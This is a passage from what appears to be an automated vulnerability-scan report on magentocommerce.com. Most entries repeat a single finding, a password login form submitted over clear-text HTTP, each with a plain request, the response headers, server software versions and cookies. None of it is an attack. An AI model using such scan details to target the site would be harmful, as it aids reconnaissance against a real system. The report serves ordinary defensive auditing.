Last-Modified: Fri, 12 Aug 2011 15:07:26 GMT
Content-Length: 34645

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.83. http://www.magentocommerce.com/media/screencasts/designers-guide-1/view  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/designers-guide-1/view

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /media/screencasts/designers-guide-1/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:07:06 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176026; expires=Sat, 11-Aug-2012 15:07:06 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A42%3A%22%2Fmedia%2Fscreencasts%2Fdesigners-guide-1%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:07:06 GMT
Content-Length: 37478

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.84. http://www.magentocommerce.com/media/screencasts/gift-certificates-cards/view  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/gift-certificates-cards/view

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /media/screencasts/gift-certificates-cards/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:06:43 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176002; expires=Sat, 11-Aug-2012 15:06:42 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A48%3A%22%2Fmedia%2Fscreencasts%2Fgift-certificates-cards%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:06:43 GMT
Content-Length: 33319

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.85. http://www.magentocommerce.com/media/screencasts/grouped-products/view  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/grouped-products/view

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /media/screencasts/grouped-products/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:09:15 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176154; expires=Sat, 11-Aug-2012 15:09:14 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A41%3A%22%2Fmedia%2Fscreencasts%2Fgrouped-products%2Fview%2F%22%3Bi%3A1%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A2%3Bs%3A5%3A%22index%22%3Bi%3A3%3Bs%3A20%3A%22%2Fcompany%2Finthepress%2F%22%3Bi%3A4%3Bs%3A28%3A%22%2Fproduct%2Fdeployed-solutions%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:09:15 GMT
Content-Length: 33124

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.86. http://www.magentocommerce.com/media/screencasts/introducing-the-magento-enterprise-edition/view  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/introducing-the-magento-enterprise-edition/view

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /media/screencasts/introducing-the-magento-enterprise-edition/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:06:28 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175988; expires=Sat, 11-Aug-2012 15:06:28 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A67%3A%22%2Fmedia%2Fscreencasts%2Fintroducing-the-magento-enterprise-edition%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:06:28 GMT
Content-Length: 33321

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.87. http://www.magentocommerce.com/media/screencasts/landing-pages/view  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/landing-pages/view

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /media/screencasts/landing-pages/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:07:37 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176057; expires=Sat, 11-Aug-2012 15:07:37 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A38%3A%22%2Fmedia%2Fscreencasts%2Flanding-pages%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:07:37 GMT
Content-Length: 36261

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.88. http://www.magentocommerce.com/media/screencasts/permissions/view  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/permissions/view

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /media/screencasts/permissions/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:07:06 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176026; expires=Sat, 11-Aug-2012 15:07:06 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A36%3A%22%2Fmedia%2Fscreencasts%2Fpermissions%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:07:06 GMT
Content-Length: 35264

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.89. http://www.magentocommerce.com/media/screencasts/private-sales-including-events-invitations-and-category-access-permissions/view  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/private-sales-including-events-invitations-and-category-access-permissions/view

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /media/screencasts/private-sales-including-events-invitations-and-category-access-permissions/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:06:46 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176006; expires=Sat, 11-Aug-2012 15:06:46 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A99%3A%22%2Fmedia%2Fscreencasts%2Fprivate-sales-including-events-invitations-and-category-access-permissions%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:06:46 GMT
Content-Length: 33592

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.90. http://www.magentocommerce.com/media/screencasts/product-comparison/view  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/product-comparison/view

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /media/screencasts/product-comparison/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:07:38 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176058; expires=Sat, 11-Aug-2012 15:07:38 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A43%3A%22%2Fmedia%2Fscreencasts%2Fproduct-comparison%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:07:38 GMT
Content-Length: 33268

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.91. http://www.magentocommerce.com/media/screencasts/search/view  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/search/view

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /media/screencasts/search/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:08:13 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_PHPSESSID=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_guid=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utma=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmb=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmc=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmz=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp__mkto_trk=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_PHPSESSID=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_guid=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmc=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_homepage_intro=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_homepage_intro=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_WRUID=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_frontend=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utma=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmz=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp__mkto_trk=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_domain=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_visit=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_activity=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmb=deleted; expires=Thu, 12-Aug-2010 15:08:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_domain=c; expires=Sun, 12-Aug-2012 01:16:32 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_activity=1313176092; expires=Sat, 11-Aug-2012 15:08:12 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A31%3A%22%2Fmedia%2Fscreencasts%2Fsearch%2Fview%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:08:13 GMT
Content-Length: 33227

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.92. http://www.magentocommerce.com/media/screencasts/single-page-checkout-guest-checkout/view  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/single-page-checkout-guest-checkout/view

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /media/screencasts/single-page-checkout-guest-checkout/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:09:34 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176174; expires=Sat, 11-Aug-2012 15:09:34 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A60%3A%22%2Fmedia%2Fscreencasts%2Fsingle-page-checkout-guest-checkout%2Fview%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:09:34 GMT
Content-Length: 34173

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.93. http://www.magentocommerce.com/media/screencasts/static-blocks/view  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/static-blocks/view

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /media/screencasts/static-blocks/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:06:51 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176010; expires=Sat, 11-Aug-2012 15:06:50 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A38%3A%22%2Fmedia%2Fscreencasts%2Fstatic-blocks%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:06:51 GMT
Content-Length: 34297

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.94. http://www.magentocommerce.com/media/screencasts/transactional-email/view  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/transactional-email/view

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /media/screencasts/transactional-email/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:07:18 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176037; expires=Sat, 11-Aug-2012 15:07:17 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A44%3A%22%2Fmedia%2Fscreencasts%2Ftransactional-email%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:07:18 GMT
Content-Length: 34426

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.95. http://www.magentocommerce.com/media/screencasts/upsells/view  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/upsells/view

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /media/screencasts/upsells/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:09:25 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176165; expires=Sat, 11-Aug-2012 15:09:25 GMT; path=/; domain=magentocommerce.com
